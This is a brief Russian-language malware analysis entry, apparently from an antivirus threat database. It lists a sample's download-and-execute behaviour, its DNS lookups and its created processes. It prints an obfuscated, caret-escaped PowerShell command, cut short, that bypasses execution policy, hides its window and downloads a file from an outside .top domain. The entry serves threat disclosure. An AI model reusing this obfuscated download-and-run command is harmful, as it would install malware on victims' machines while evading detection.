Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://www.dandyhomern.top/read.php?f=0.dat как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C "pOWE^RshEL^l.^e^xE^ -eXECuTi^onp^oL^IcY bypASs^ ^-^No^pR^oF^iL^e^ ^-WiN^DO^W^StylE ^HIdD^eN^ (^nEw-oBJe^Ct ^SY^S^T^em^.NET.^w^E^B^cl^I^E^Nt^).^DoW^Nl^o^aDf^IL^E('http://www.da...
Сетевая активность
UDP
- DNS ASK da###homern.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /C "pOWE^RshEL^l.^e^xE^ -eXECuTi^onp^oL^IcY bypASs^ ^-^No^pR^oF^iL^e^ ^-WiN^DO^W^StylE ^HIdD^eN^ (^nEw-oBJe^Ct ^SY^S^T^em^.NET.^w^E^B^cl^I^E^Nt^).^DoW^Nl^o^aDf^IL^E('http://www.da...' (со скрытым окном)
